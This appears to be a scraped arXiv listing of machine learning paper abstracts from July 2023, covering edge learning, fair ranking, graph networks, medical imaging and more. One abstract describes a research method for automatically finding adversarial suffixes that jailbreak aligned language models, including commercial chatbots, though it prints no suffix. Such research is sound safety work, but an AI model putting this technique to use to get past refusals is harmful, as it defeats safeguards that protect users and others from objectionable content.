    Deep edge intelligence aims to deploy deep learning models that demand computationally expensive training in the edge network with limited computational power. Moreover, many deep edge intelligence applications require handling distributed data that cannot be transferred to a central server due to privacy concerns. Decentralized learning methods, such as federated learning, offer solutions where models are learned collectively by exchanging learned weights. However, they often require complex models that edge devices may not handle and multiple rounds of network communication to achieve state-of-the-art performances. This study proposes a convolutional ensemble learning approach, coined EdgeConvEns, that facilitates training heterogeneous weak models on edge and learning to ensemble them where data on edge are heterogeneously distributed. Edge models are implemented and trained independently on Field-Programmable Gate Array (FPGA) devices with various computational capacities. Learned data representations are transferred to a central server where the ensemble model is trained with the learned features received from the edge devices to boost the overall prediction performance. Extensive experiments demonstrate that the EdgeConvEns can outperform the state-of-the-art performance with fewer communications and less data in various training scenarios.
    Explainable Disparity Compensation for Efficient Fair Ranking. (arXiv:2307.14366v1 [cs.LG])
    Ranking functions that are used in decision systems often produce disparate results for different populations because of bias in the underlying data. Addressing, and compensating for, these disparate outcomes is a critical problem for fair decision-making. Recent compensatory measures have mostly focused on opaque transformations of the ranking functions to satisfy fairness guarantees or on the use of quotas or set-asides to guarantee a minimum number of positive outcomes to members of underrepresented groups. In this paper we propose easily explainable data-driven compensatory measures for ranking functions. Our measures rely on the generation of bonus points given to members of underrepresented groups to address disparity in the ranking function. The bonus points can be set in advance, and can be combined, allowing for considering the intersections of representations and giving better transparency to stakeholders. We propose efficient sampling-based algorithms to calculate the number of bonus points to minimize disparity. We validate our algorithms using real-world school admissions and recidivism datasets, and compare our results with that of existing fair ranking algorithms.
    Towards Better Generalization with Flexible Representation of Multi-Module Graph Neural Networks. (arXiv:2209.06589v3 [cs.LG] UPDATED)
    Graph neural networks (GNNs) have become compelling models designed to perform learning and inference on graph-structured data. However, little work has been done to understand the fundamental limitations of GNNs for scaling to larger graphs and generalizing to out-of-distribution (OOD) inputs. In this paper, we use a random graph generator to systematically investigate how the graph size and structural properties affect the predictive performance of GNNs. We present specific evidence that the average node degree is a key feature in determining whether GNNs can generalize to unseen graphs, and that the use of multiple node update functions can improve the generalization performance of GNNs when dealing with graphs of multimodal degree distributions. Accordingly, we propose a multi-module GNN framework that allows the network to adapt flexibly to new graphs by generalizing a single canonical nonlinear transformation over aggregated inputs. Our results show that the multi-module GNNs improve the OOD generalization on a variety of inference tasks in the direction of diverse structural features.
    Universal and Transferable Adversarial Attacks on Aligned Language Models. (arXiv:2307.15043v1 [cs.CL])
    Because "out-of-the-box" large language models are capable of generating a great deal of objectionable content, recent work has focused on aligning these models in an attempt to prevent undesirable generation. While there has been some success at circumventing these measures -- so-called "jailbreaks" against LLMs -- these attacks have required significant human ingenuity and are brittle in practice. In this paper, we propose a simple and effective attack method that causes aligned language models to generate objectionable behaviors. Specifically, our approach finds a suffix that, when attached to a wide range of queries for an LLM to produce objectionable content, aims to maximize the probability that the model produces an affirmative response (rather than refusing to answer). However, instead of relying on manual engineering, our approach automatically produces these adversarial suffixes by a combination of greedy and gradient-based search techniques, and also improves over past automatic prompt generation methods. Surprisingly, we find that the adversarial prompts generated by our approach are quite transferable, including to black-box, publicly released LLMs. Specifically, we train an adversarial attack suffix on multiple prompts (i.e., queries asking for many different types of objectionable content), as well as multiple models (in our case, Vicuna-7B and 13B). When doing so, the resulting attack suffix is able to induce objectionable content in the public interfaces to ChatGPT, Bard, and Claude, as well as open source LLMs such as LLaMA-2-Chat, Pythia, Falcon, and others. In total, this work significantly advances the state-of-the-art in adversarial attacks against aligned language models, raising important questions about how such systems can be prevented from producing objectionable information. Code is available at github.com/llm-attacks/llm-attacks.
    Semantic Image Completion and Enhancement using GANs. (arXiv:2307.14748v1 [cs.CV])
    Semantic inpainting or image completion alludes to the task of inferring arbitrary large missing regions in images based on image semantics. Since the prediction of image pixels requires an indication of high-level context, this makes it significantly tougher than image completion, which is often more concerned with correcting data corruption and removing entire objects from the input image. On the other hand, image enhancement attempts to eliminate unwanted noise and blur from the image, along with sustaining most of the image details. Efficient image completion and enhancement model should be able to recover the corrupted and masked regions in images and then refine the image further to increase the quality of the output image. Generative Adversarial Networks (GAN), have turned out to be helpful in picture completion tasks. In this chapter, we will discuss the underlying GAN architecture and how they can be used used for image completion tasks.
    Adversarial Sleeping Bandit Problems with Multiple Plays: Algorithm and Ranking Application. (arXiv:2307.14549v1 [cs.LG])
    This paper presents an efficient algorithm to solve the sleeping bandit with multiple plays problem in the context of an online recommendation system. The problem involves bounded, adversarial loss and unknown i.i.d. distributions for arm availability. The proposed algorithm extends the sleeping bandit algorithm for single arm selection and is guaranteed to achieve theoretical performance with regret upper bounded by $\bigO(kN^2\sqrt{T\log T})$, where $k$ is the number of arms selected per time step, $N$ is the total number of arms, and $T$ is the time horizon.
    Likely, Light, and Accurate Context-Free Clusters-based Trajectory Prediction. (arXiv:2307.14788v1 [cs.LG])
    Autonomous systems in the road transportation network require intelligent mechanisms that cope with uncertainty to foresee the future. In this paper, we propose a multi-stage probabilistic approach for trajectory forecasting: trajectory transformation to displacement space, clustering of displacement time series, trajectory proposals, and ranking proposals. We introduce a new deep feature clustering method, underlying self-conditioned GAN, which copes better with distribution shifts than traditional methods. Additionally, we propose novel distance-based ranking proposals to assign probabilities to the generated trajectories that are more efficient yet accurate than an auxiliary neural network. The overall system surpasses context-free deep generative models in human and road agents trajectory data while performing similarly to point estimators when comparing the most probable trajectory.
    Incrementally-Computable Neural Networks: Efficient Inference for Dynamic Inputs. (arXiv:2307.14988v1 [cs.LG])
    Deep learning often faces the challenge of efficiently processing dynamic inputs, such as sensor data or user inputs. For example, an AI writing assistant is required to update its suggestions in real time as a document is edited. Re-running the model each time is expensive, even with compression techniques like knowledge distillation, pruning, or quantization. Instead, we take an incremental computing approach, looking to reuse calculations as the inputs change. However, the dense connectivity of conventional architectures poses a major obstacle to incremental computation, as even minor input changes cascade through the network and restrict information reuse. To address this, we use vector quantization to discretize intermediate values in the network, which filters out noisy and unnecessary modifications to hidden neurons, facilitating the reuse of their values. We apply this approach to the transformers architecture, creating an efficient incremental inference algorithm with complexity proportional to the fraction of the modified inputs. Our experiments with adapting the OPT-125M pre-trained language model demonstrate comparable accuracy on document classification while requiring 12.1X (median) fewer operations for processing sequences of atomic edits.
    Kernelised Normalising Flows. (arXiv:2307.14839v1 [stat.ML])
    Normalising Flows are generative models characterised by their invertible architecture. However, the requirement of invertibility imposes constraints on their expressiveness, necessitating a large number of parameters and innovative architectural designs to achieve satisfactory outcomes. Whilst flow-based models predominantly rely on neural-network-based transformations for expressive designs, alternative transformation methods have received limited attention. In this work, we present Ferumal flow, a novel kernelised normalising flow paradigm that integrates kernels into the framework. Our results demonstrate that a kernelised flow can yield competitive or superior results compared to neural network-based flows whilst maintaining parameter efficiency. Kernelised flows excel especially in the low-data regime, enabling flexible non-parametric density estimation in applications with sparse data availability.
    Solving Data Quality Problems with Desbordante: a Demo. (arXiv:2307.14935v1 [cs.DB])
    Data profiling is an essential process in modern data-driven industries. One of its critical components is the discovery and validation of complex statistics, including functional dependencies, data constraints, association rules, and others. However, most existing data profiling systems that focus on complex statistics do not provide proper integration with the tools used by contemporary data scientists. This creates a significant barrier to the adoption of these tools in the industry. Moreover, existing systems were not created with industrial-grade workloads in mind. Finally, they do not aim to provide descriptive explanations, i.e. why a given pattern is not found. It is a significant issue as it is essential to understand the underlying reasons for a specific pattern's absence to make informed decisions based on the data. Because of that, these patterns are effectively rest in thin air: their application scope is rather limited, they are rarely used by the broader public. At the same time, as we are going to demonstrate in this presentation, complex statistics can be efficiently used to solve many classic data quality problems. Desbordante is an open-source data profiler that aims to close this gap. It is built with emphasis on industrial application: it is efficient, scalable, resilient to crashes, and provides explanations. Furthermore, it provides seamless Python integration by offloading various costly operations to the C++ core, not only mining. In this demonstration, we show several scenarios that allow end users to solve different data quality problems. Namely, we showcase typo detection, data deduplication, and data anomaly detection scenarios.
    Network Fault-tolerant and Byzantine-resilient Social Learning via Collaborative Hierarchical Non-Bayesian Learning. (arXiv:2307.14952v1 [cs.LG])
    As the network scale increases, existing fully distributed solutions start to lag behind the real-world challenges such as (1) slow information propagation, (2) network communication failures, and (3) external adversarial attacks. In this paper, we focus on hierarchical system architecture and address the problem of non-Bayesian learning over networks that are vulnerable to communication failures and adversarial attacks. On network communication, we consider packet-dropping link failures. We first propose a hierarchical robust push-sum algorithm that can achieve average consensus despite frequent packet-dropping link failures. We provide a sparse information fusion rule between the parameter server and arbitrarily selected network representatives. Then, interleaving the consensus update step with a dual averaging update with Kullback-Leibler (KL) divergence as the proximal function, we obtain a packet-dropping fault-tolerant non-Bayesian learning algorithm with provable convergence guarantees. On external adversarial attacks, we consider Byzantine attacks in which the compromised agents can send maliciously calibrated messages to others (including both the agents and the parameter server). To avoid the curse of dimensionality of Byzantine consensus, we solve the non-Bayesian learning problem via running multiple dynamics, each of which only involves Byzantine consensus with scalar inputs. To facilitate resilient information propagation across sub-networks, we use a novel Byzantine-resilient gossiping-type rule at the parameter server.
    Role of Image Acquisition and Patient Phenotype Variations in Automatic Segmentation Model Generalization. (arXiv:2307.14482v1 [eess.IV])
    Purpose: This study evaluated the out-of-domain performance and generalization capabilities of automated medical image segmentation models, with a particular focus on adaptation to new image acquisitions and disease type. Materials: Datasets from both non-contrast and contrast-enhanced abdominal CT scans of healthy patients and those with polycystic kidney disease (PKD) were used. A total of 400 images (100 non-contrast controls, 100 contrast controls, 100 non-contrast PKD, 100 contrast PKD) were utilized for training/validation of models to segment kidneys, livers, and spleens, and the final models were then tested on 100 non-contrast CT images of patients affected by PKD. Performance was evaluated using Dice, Jaccard, TPR, and Precision. Results: Models trained on a diverse range of data showed no worse performance than models trained exclusively on in-domain data when tested on in-domain data. For instance, the Dice similarity of the model trained on 25% from each dataset was found to be non-inferior to the model trained purely on in-domain data. Conclusions: The results indicate that broader training examples significantly enhances model generalization and out-of-domain performance, thereby improving automated segmentation tools' applicability in clinical settings. The study's findings provide a roadmap for future research to adopt a data-centric approach in medical image AI model development.
    Evaluation of Safety Constraints in Autonomous Navigation with Deep Reinforcement Learning. (arXiv:2307.14568v1 [cs.RO])
    While reinforcement learning algorithms have had great success in the field of autonomous navigation, they cannot be straightforwardly applied to the real autonomous systems without considering the safety constraints. The later are crucial to avoid unsafe behaviors of the autonomous vehicle on the road. To highlight the importance of these constraints, in this study, we compare two learnable navigation policies: safe and unsafe. The safe policy takes the constraints into account, while the other does not. We show that the safe policy is able to generate trajectories with more clearance (distance to the obstacles) and makes less collisions while training without sacrificing the overall performance.
    A Hybrid Machine Learning Model for Classifying Gene Mutations in Cancer using LSTM, BiLSTM, CNN, GRU, and GloVe. (arXiv:2307.14361v1 [q-bio.QM])
    This study presents an ensemble model combining LSTM, BiLSTM, CNN, GRU, and GloVe to classify gene mutations using Kaggle's Personalized Medicine: Redefining Cancer Treatment dataset. The results were compared against well-known transformers like as BERT, Electra, Roberta, XLNet, Distilbert, and their LSTM ensembles. Our model outperformed all other models in terms of accuracy, precision, recall, F1 score, and Mean Squared Error. Surprisingly, it also needed less training time, resulting in a perfect combination of performance and efficiency. This study demonstrates the utility of ensemble models for difficult tasks such as gene mutation classification.
    Imitating Complex Trajectories: Bridging Low-Level Stability and High-Level Behavior. (arXiv:2307.14619v1 [cs.LG])
    We propose a theoretical framework for studying the imitation of stochastic, non-Markovian, potentially multi-modal (i.e. "complex" ) expert demonstrations in nonlinear dynamical systems. Our framework invokes low-level controllers - either learned or implicit in position-command control - to stabilize imitation policies around expert demonstrations. We show that with (a) a suitable low-level stability guarantee and (b) a stochastic continuity property of the learned policy we call "total variation continuity" (TVC), an imitator that accurately estimates actions on the demonstrator's state distribution closely matches the demonstrator's distribution over entire trajectories. We then show that TVC can be ensured with minimal degradation of accuracy by combining a popular data-augmentation regimen with a novel algorithmic trick: adding augmentation noise at execution time. We instantiate our guarantees for policies parameterized by diffusion models and prove that if the learner accurately estimates the score of the (noise-augmented) expert policy, then the distribution of imitator trajectories is close to the demonstrator distribution in a natural optimal transport distance. Our analysis constructs intricate couplings between noise-augmented trajectories, a technique that may be of independent interest. We conclude by empirically validating our algorithmic recommendations.
    Unsupervised Deep Learning-based Pansharpening with Jointly-Enhanced Spectral and Spatial Fidelity. (arXiv:2307.14403v1 [eess.IV])
    In latest years, deep learning has gained a leading role in the pansharpening of multiresolution images. Given the lack of ground truth data, most deep learning-based methods carry out supervised training in a reduced-resolution domain. However, models trained on downsized images tend to perform poorly on high-resolution target images. For this reason, several research groups are now turning to unsupervised training in the full-resolution domain, through the definition of appropriate loss functions and training paradigms. In this context, we have recently proposed a full-resolution training framework which can be applied to many existing architectures. Here, we propose a new deep learning-based pansharpening model that fully exploits the potential of this approach and provides cutting-edge performance. Besides architectural improvements with respect to previous work, such as the use of residual attention modules, the proposed model features a novel loss function that jointly promotes the spectral and spatial quality of the pansharpened data. In addition, thanks to a new fine-tuning strategy, it improves inference-time adaptation to target images. Experiments on a large variety of test images, performed in challenging scenarios, demonstrate that the proposed method compares favorably with the state of the art both in terms of numerical results and visual output. Code is available online at https://github.com/matciotola/Lambda-PNN.
    Empirical analysis of Different Dimensionality Reduction and classification Techniques for Epileptic Seizure detection. (arXiv:2302.12012v2 [cs.LG] UPDATED)
    An Electroencephalogram (EEG) is a non-invasive exam that records the electrical activity of the brain. This exam is used to help diagnose conditions such as different brain problems. EEG signals are taken for the purpose of epilepsy detection and with Discrete Wavelet Transform (DWT) and machine learning classifier, they perform epilepsy detection. In Epilepsy seizure detection, mainly machine learning classifiers and statistical features are used. The hidden information in the EEG signal is useful for detecting diseases affecting the brain. Sometimes it is very difficult to identify the minimum changes in the EEG in the time and frequency domains purpose. The DWT can give a good decomposition of the signals in different frequency bands and feature extraction. We use the tri-dimensionality reduction algorithm.; Principal Component Analysis (PCA), Independent Component Analysis (ICA), and Linear Discriminant Analysis (LDA). Finally, features are selected by using a fusion rule and at the last step three different classifiers Support Vector Machine (SVM), Naive Bayes (NB) and K-Nearest-Neighbor(KNN) have been used individually for the classification. The proposed framework is tested on the Bonn dataset and the simulation results provide the accuracy for the combination of LDA and SVM 89.17%, LDA and KNN 80.42%, PCA and NB 89.92%, PCA and SVM 85.58%, PCA and KNN 80.42%, ICA and NB 82.33%, ICA and SVM 90.42%, and ICA and KNN 90%, LDA and NB 100%, accuracy. It shows the sensitivity, specificity, accuracy, Precision, and Recall of 100%, 100%, 100%, 100%, and 100%. This combination of LDA with NB method provides the accuracy of 100% outperforming all existing methods. The results prove the effectiveness of this model.
    When Multi-Task Learning Meets Partial Supervision: A Computer Vision Review. (arXiv:2307.14382v1 [cs.LG])
    Multi-Task Learning (MTL) aims to learn multiple tasks simultaneously while exploiting their mutual relationships. By using shared resources to simultaneously calculate multiple outputs, this learning paradigm has the potential to have lower memory requirements and inference times compared to the traditional approach of using separate methods for each task. Previous work in MTL has mainly focused on fully-supervised methods, as task relationships can not only be leveraged to lower the level of data-dependency of those methods but they can also improve performance. However, MTL introduces a set of challenges due to a complex optimisation scheme and a higher labeling requirement. This review focuses on how MTL could be utilised under different partial supervision settings to address these challenges. First, this review analyses how MTL traditionally uses different parameter sharing techniques to transfer knowledge in between tasks. Second, it presents the different challenges arising from such a multi-objective optimisation scheme. Third, it introduces how task groupings can be achieved by analysing task relationships. Fourth, it focuses on how partially supervised methods applied to MTL can tackle the aforementioned challenges. Lastly, this review presents the available datasets, tools and benchmarking results of such methods.
    Machine Learning with a Reject Option: A survey. (arXiv:2107.11277v2 [cs.LG] UPDATED)
    Machine learning models always make a prediction, even when it is likely to be inaccurate. This behavior should be avoided in many decision support applications, where mistakes can have severe consequences. Albeit already studied in 1970, machine learning with rejection recently gained interest. This machine learning subfield enables machine learning models to abstain from making a prediction when likely to make a mistake. This survey aims to provide an overview on machine learning with rejection. We introduce the conditions leading to two types of rejection, ambiguity and novelty rejection, which we carefully formalize. Moreover, we review and categorize strategies to evaluate a model's predictive and rejective quality. Additionally, we define the existing architectures for models with rejection and describe the standard techniques for learning such models. Finally, we provide examples of relevant application domains and show how machine learning with rejection relates to other machine learning research areas.
    Fixed Integral Neural Networks. (arXiv:2307.14439v1 [cs.LG])
    It is often useful to perform integration over learned functions represented by neural networks. However, this integration is usually performed numerically, as analytical integration over learned functions (especially neural networks) is generally viewed as intractable. In this work, we present a method for representing the analytical integral of a learned function $f$. This allows the exact integral of a neural network to be computed, and enables constrained neural networks to be parametrised by applying constraints directly to the integral. Crucially, we also introduce a method to constrain $f$ to be positive, a necessary condition for many applications (e.g. probability distributions, distance metrics, etc). Finally, we introduce several applications where our fixed-integral neural network (FINN) can be utilised.
    Diff-E: Diffusion-based Learning for Decoding Imagined Speech EEG. (arXiv:2307.14389v1 [eess.AS])
    Decoding EEG signals for imagined speech is a challenging task due to the high-dimensional nature of the data and low signal-to-noise ratio. In recent years, denoising diffusion probabilistic models (DDPMs) have emerged as promising approaches for representation learning in various domains. Our study proposes a novel method for decoding EEG signals for imagined speech using DDPMs and a conditional autoencoder named Diff-E. Results indicate that Diff-E significantly improves the accuracy of decoding EEG signals for imagined speech compared to traditional machine learning techniques and baseline models. Our findings suggest that DDPMs can be an effective tool for EEG signal decoding, with potential implications for the development of brain-computer interfaces that enable communication through imagined speech.  ( 2 min )
    Hypergraph Isomorphism Computation. (arXiv:2307.14394v1 [cs.DS])
    The isomorphism problem is a fundamental problem in network analysis, which involves capturing both low-order and high-order structural information. In terms of extracting low-order structural information, graph isomorphism algorithms analyze the structural equivalence to reduce the solver space dimension, which demonstrates its power in many applications, such as protein design, chemical pathways, and community detection. For the more commonly occurring high-order relationships in real-life scenarios, the problem of hypergraph isomorphism, which effectively captures these high-order structural relationships, cannot be straightforwardly addressed using graph isomorphism methods. Besides, the existing hypergraph kernel methods may suffer from high memory consumption or inaccurate sub-structure identification, thus yielding sub-optimal performance. In this paper, to address the abovementioned problems, we first propose the hypergraph Weisfiler-Lehman test algorithm for the hypergraph isomorphism test problem by generalizing the Weisfiler-Lehman test algorithm from graphs to hypergraphs. Secondly, based on the presented algorithm, we propose a general hypergraph Weisfieler-Lehman kernel framework and implement two instances, which are Hypergraph Weisfeiler-Lehamn Subtree Kernel and Hypergraph Weisfeiler-Lehamn Hyperedge Kernel. In order to fulfill our research objectives, a comprehensive set of experiments was meticulously designed, including seven graph classification datasets and 12 hypergraph classification datasets. Results on hypergraph classification datasets show significant improvements compared to other typical kernel-based methods, which demonstrates the effectiveness of the proposed methods. In our evaluation, we found that our proposed methods outperform the second-best method in terms of runtime, running over 80 times faster when handling complex hypergraph structures.  ( 2 min )
    Multi-objective Deep Reinforcement Learning for Mobile Edge Computing. (arXiv:2307.14346v1 [cs.NI])
    Mobile edge computing (MEC) is essential for next-generation mobile network applications that prioritize various performance metrics, including delays and energy consumption. However, conventional single-objective scheduling solutions cannot be directly applied to practical systems in which the preferences of these applications (i.e., the weights of different objectives) are often unknown or challenging to specify in advance. In this study, we address this issue by formulating a multi-objective offloading problem for MEC with multiple edges to minimize expected long-term energy consumption and transmission delay while considering unknown preferences as parameters. To address the challenge of unknown preferences, we design a multi-objective (deep) reinforcement learning (MORL)-based resource scheduling scheme with proximal policy optimization (PPO). In addition, we introduce a well-designed state encoding method for constructing features for multiple edges in MEC systems, a sophisticated reward function for accurately computing the utilities of delay and energy consumption. Simulation results demonstrate that our proposed MORL scheme enhances the hypervolume of the Pareto front by up to 233.1% compared to benchmarks. Our full framework is available at https://github.com/gracefulning/mec_morl_multipolicy.  ( 2 min )
    A new derivative-free optimization method: Gaussian Crunching Search. (arXiv:2307.14359v1 [math.OC])
    Optimization methods are essential in solving complex problems across various domains. In this research paper, we introduce a novel optimization method called Gaussian Crunching Search (GCS). Inspired by the behaviour of particles in a Gaussian distribution, GCS aims to efficiently explore the solution space and converge towards the global optimum. We present a comprehensive analysis of GCS, including its working mechanism, and potential applications. Through experimental evaluations and comparisons with existing optimization methods, we highlight the advantages and strengths of GCS. This research paper serves as a valuable resource for researchers, practitioners, and students interested in optimization, providing insights into the development and potential of Gaussian Crunching Search as a new and promising approach.  ( 2 min )
  • Open

    A Bayesian approach to quantifying uncertainties and improving generalizability in traffic prediction models. (arXiv:2307.05946v3 [cs.LG] UPDATED)
    Deep-learning models for traffic data prediction can have superior performance in modeling complex functions using a multi-layer architecture. However, a major drawback of these approaches is that most of these approaches do not offer forecasts with uncertainty estimates, which are essential for traffic operations and control. Without uncertainty estimates, it is difficult to place any level of trust to the model predictions, and operational strategies relying on overconfident predictions can lead to worsening traffic conditions. In this study, we propose a Bayesian recurrent neural network framework for uncertainty quantification in traffic prediction with higher generalizability by introducing spectral normalization to its hidden layers. In our paper, we have shown that normalization alters the training process of deep neural networks by controlling the model's complexity and reducing the risk of overfitting to the training data. This, in turn, helps improve the generalization performance of the model on out-of-distribution datasets. Results demonstrate that spectral normalization improves uncertainty estimates and significantly outperforms both the layer normalization and model without normalization in single-step prediction horizons. This improved performance can be attributed to the ability of spectral normalization to better localize the feature space of the data under perturbations. Our findings are especially relevant to traffic management applications, where predicting traffic conditions across multiple locations is the goal, but the availability of training data from multiple locations is limited. Spectral normalization, therefore, provides a more generalizable approach that can effectively capture the underlying patterns in traffic data without requiring location-specific models.
    Automating Model Comparison in Factor Graphs. (arXiv:2306.05965v2 [cs.LG] UPDATED)
    Bayesian state and parameter estimation have been automated effectively in a variety of probabilistic programming languages. The process of model comparison on the other hand, which still requires error-prone and time-consuming manual derivations, is often overlooked despite its importance. This paper efficiently automates Bayesian model averaging, selection, and combination by message passing on a Forney-style factor graph with a custom mixture node. Parameter and state inference, and model comparison can then be executed simultaneously using message passing with scale factors. This approach shortens the model design cycle and allows for the straightforward extension to hierarchical and temporal model priors to accommodate for modeling complicated time-varying processes.
    Algorithmic Gaussianization through Sketching: Converting Data into Sub-gaussian Random Designs. (arXiv:2206.10291v2 [cs.LG] UPDATED)
    Algorithmic Gaussianization is a phenomenon that can arise when using randomized sketching or sampling methods to produce smaller representations of large datasets: For certain tasks, these sketched representations have been observed to exhibit many robust performance characteristics that are known to occur when a data sample comes from a sub-gaussian random design, which is a powerful statistical model of data distributions. However, this phenomenon has only been studied for specific tasks and metrics, or by relying on computationally expensive methods. We address this by providing an algorithmic framework for gaussianizing data distributions via averaging, proving that it is possible to efficiently construct data sketches that are nearly indistinguishable (in terms of total variation distance) from sub-gaussian random designs. In particular, relying on a recently introduced sketching technique called Leverage Score Sparsified (LESS) embeddings, we show that one can construct an $n\times d$ sketch of an $N\times d$ matrix $A$, where $n\ll N$, that is nearly indistinguishable from a sub-gaussian design, in time $O(\text{nnz}(A)\log N + nd^2)$, where $\text{nnz}(A)$ is the number of non-zero entries in $A$. As a consequence, strong statistical guarantees and precise asymptotics available for the estimators produced from sub-gaussian designs (e.g., for least squares and Lasso regression, covariance estimation, low-rank approximation, etc.) can be straightforwardly adapted to our sketching framework. We illustrate this with a new approximation guarantee for sketched least squares, among other examples.  ( 3 min )
    Likelihood-Free Parameter Estimation with Neural Bayes Estimators. (arXiv:2208.12942v4 [stat.ME] UPDATED)
    Neural point estimators are neural networks that map data to parameter point estimates. They are fast, likelihood free and, due to their amortised nature, amenable to fast bootstrap-based uncertainty quantification. In this paper, we aim to increase the awareness of statisticians to this relatively new inferential tool, and to facilitate its adoption by providing user-friendly open-source software. We also give attention to the ubiquitous problem of making inference from replicated data, which we address in the neural setting using permutation-invariant neural networks. Through extensive simulation studies we show that these neural point estimators can quickly and optimally (in a Bayes sense) estimate parameters in weakly-identified and highly-parameterised models with relative ease. We demonstrate their applicability through an analysis of extreme sea-surface temperature in the Red Sea where, after training, we obtain parameter estimates and bootstrap-based confidence intervals from hundreds of spatial fields in a fraction of a second.  ( 2 min )
    On the Generalization Effects of Linear Transformations in Data Augmentation. (arXiv:2005.00695v3 [cs.LG] UPDATED)
    Data augmentation is a powerful technique to improve performance in applications such as image and text classification tasks. Yet, there is little rigorous understanding of why and how various augmentations work. In this work, we consider a family of linear transformations and study their effects on the ridge estimator in an over-parametrized linear regression setting. First, we show that transformations that preserve the labels of the data can improve estimation by enlarging the span of the training data. Second, we show that transformations that mix data can improve estimation by playing a regularization effect. Finally, we validate our theoretical insights on MNIST. Based on the insights, we propose an augmentation scheme that searches over the space of transformations by how uncertain the model is about the transformed data. We validate our proposed scheme on image and text datasets. For example, our method outperforms random sampling methods by 1.24% on CIFAR-100 using Wide-ResNet-28-10. Furthermore, we achieve comparable accuracy to the SoTA Adversarial AutoAugment on CIFAR-10, CIFAR-100, SVHN, and ImageNet datasets.  ( 2 min )
    Kernelised Normalising Flows. (arXiv:2307.14839v1 [stat.ML])
    Normalising Flows are generative models characterised by their invertible architecture. However, the requirement of invertibility imposes constraints on their expressiveness, necessitating a large number of parameters and innovative architectural designs to achieve satisfactory outcomes. Whilst flow-based models predominantly rely on neural-network-based transformations for expressive designs, alternative transformation methods have received limited attention. In this work, we present Ferumal flow, a novel kernelised normalising flow paradigm that integrates kernels into the framework. Our results demonstrate that a kernelised flow can yield competitive or superior results compared to neural network-based flows whilst maintaining parameter efficiency. Kernelised flows excel especially in the low-data regime, enabling flexible non-parametric density estimation in applications with sparse data availability.  ( 2 min )
    Multi-Source Domain Adaptation through Dataset Dictionary Learning in Wasserstein Space. (arXiv:2307.14953v1 [cs.LG])
    This paper seeks to solve Multi-Source Domain Adaptation (MSDA), which aims to mitigate data distribution shifts when transferring knowledge from multiple labeled source domains to an unlabeled target domain. We propose a novel MSDA framework based on dictionary learning and optimal transport. We interpret each domain in MSDA as an empirical distribution. As such, we express each domain as a Wasserstein barycenter of dictionary atoms, which are empirical distributions. We propose a novel algorithm, DaDiL, for learning via mini-batches: (i) atom distributions; (ii) a matrix of barycentric coordinates. Based on our dictionary, we propose two novel methods for MSDA: DaDil-R, based on the reconstruction of labeled samples in the target domain, and DaDiL-E, based on the ensembling of classifiers learned on atom distributions. We evaluate our methods in 3 benchmarks: Caltech-Office, Office 31, and CRWU, where we improved previous state-of-the-art by 3.15%, 2.29%, and 7.71% in classification performance. Finally, we show that interpolations in the Wasserstein hull of learned atoms provide data that can generalize to the target domain.  ( 2 min )
    Linear Convergence of Black-Box Variational Inference: Should We Stick the Landing?. (arXiv:2307.14642v1 [stat.ML])
    We prove that black-box variational inference (BBVI) with control variates, particularly the sticking-the-landing (STL) estimator, converges at a geometric (traditionally called "linear") rate under perfect variational family specification. In particular, we prove a quadratic bound on the gradient variance of the STL estimator, one which encompasses misspecified variational families. Combined with previous works on the quadratic variance condition, this directly implies convergence of BBVI with the use of projected stochastic gradient descent. We also improve existing analysis on the regular closed-form entropy gradient estimators, which enables comparison against the STL estimator and provides explicit non-asymptotic complexity guarantees for both.  ( 2 min )
    Causal Lifting and Link Prediction. (arXiv:2302.01198v2 [cs.LG] UPDATED)
    Existing causal models for link prediction assume an underlying set of inherent node factors -- an innate characteristic defined at the node's birth -- that governs the causal evolution of links in the graph. In some causal tasks, however, link formation is path-dependent: The outcome of link interventions depends on existing links. Unfortunately, these existing causal methods are not designed for path-dependent link formation, as the cascading functional dependencies between links (arising from path dependence) are either unidentifiable or require an impractical number of control variables. To overcome this, we develop the first causal model capable of dealing with path dependencies in link prediction. In this work we introduce the concept of causal lifting, an invariance in causal models of independent interest that, on graphs, allows the identification of causal link prediction queries using limited interventional data. Further, we show how structural pairwise embeddings exhibit lower bias and correctly represent the task's causal structure, as opposed to existing node embeddings, e.g., graph neural network node embeddings and matrix factorization. Finally, we validate our theoretical findings on three scenarios for causal link prediction tasks: knowledge base completion, covariance matrix estimation and consumer-product recommendations.  ( 2 min )
    Statistical process monitoring of artificial neural networks. (arXiv:2209.07436v2 [stat.ME] UPDATED)
    The rapid advancement of models based on artificial intelligence demands innovative monitoring techniques which can operate in real time with low computational costs. In machine learning, especially if we consider artificial neural networks (ANNs), the models are often trained in a supervised manner. Consequently, the learned relationship between the input and the output must remain valid during the model's deployment. If this stationarity assumption holds, we can conclude that the ANN provides accurate predictions. Otherwise, the retraining or rebuilding of the model is required. We propose considering the latent feature representation of the data (called "embedding") generated by the ANN to determine the time when the data stream starts being nonstationary. In particular, we monitor embeddings by applying multivariate control charts based on the data depth calculation and normalized ranks. The performance of the introduced method is compared with benchmark approaches for various ANN architectures and different underlying data formats.  ( 2 min )
    Imitating Complex Trajectories: Bridging Low-Level Stability and High-Level Behavior. (arXiv:2307.14619v1 [cs.LG])
    We propose a theoretical framework for studying the imitation of stochastic, non-Markovian, potentially multi-modal (i.e. "complex" ) expert demonstrations in nonlinear dynamical systems. Our framework invokes low-level controllers - either learned or implicit in position-command control - to stabilize imitation policies around expert demonstrations. We show that with (a) a suitable low-level stability guarantee and (b) a stochastic continuity property of the learned policy we call "total variation continuity" (TVC), an imitator that accurately estimates actions on the demonstrator's state distribution closely matches the demonstrator's distribution over entire trajectories. We then show that TVC can be ensured with minimal degradation of accuracy by combining a popular data-augmentation regimen with a novel algorithmic trick: adding augmentation noise at execution time. We instantiate our guarantees for policies parameterized by diffusion models and prove that if the learner accurately estimates the score of the (noise-augmented) expert policy, then the distribution of imitator trajectories is close to the demonstrator distribution in a natural optimal transport distance. Our analysis constructs intricate couplings between noise-augmented trajectories, a technique that may be of independent interest. We conclude by empirically validating our algorithmic recommendations.  ( 2 min )
    Speed Limits for Deep Learning. (arXiv:2307.14653v1 [stat.ML])
